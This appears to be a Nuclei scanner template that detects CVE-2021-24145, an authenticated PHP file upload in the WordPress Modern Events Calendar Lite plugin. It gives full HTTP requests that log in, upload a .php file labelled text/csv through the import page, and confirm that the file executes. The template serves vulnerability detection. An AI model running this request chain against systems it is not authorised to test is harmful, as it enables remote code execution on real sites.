67 lines
2.4 KiB
YAML
67 lines
2.4 KiB
YAML
id: CVE-2021-24145
|
|
|
|
info:
|
|
name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
|
|
- https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
|
|
- https://github.com/dnr6419/CVE-2021-24145
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24145
|
|
remediation: Fixed in version 5.16.5.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2021-24145
|
|
cwe-id: CWE-434
|
|
metadata:
|
|
verified: "true"
|
|
tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875
|
|
|
|
-----------------------------132370916641787807752589698875
|
|
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
|
|
Content-Type: text/csv
|
|
|
|
<?php echo 'CVE-2021-24145'; ?>
|
|
|
|
-----------------------------132370916641787807752589698875
|
|
Content-Disposition: form-data; name="mec-ix-action"
|
|
|
|
import-start-bookings
|
|
-----------------------------132370916641787807752589698875--
|
|
|
|
- |
|
|
GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
req-condition: true
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(all_headers_3, "text/html")
|
|
- status_code_3 == 200
|
|
- contains(body_3, 'CVE-2021-24145')
|
|
condition: and
|
|
|
|
# Enhanced by md on 2023/03/21
|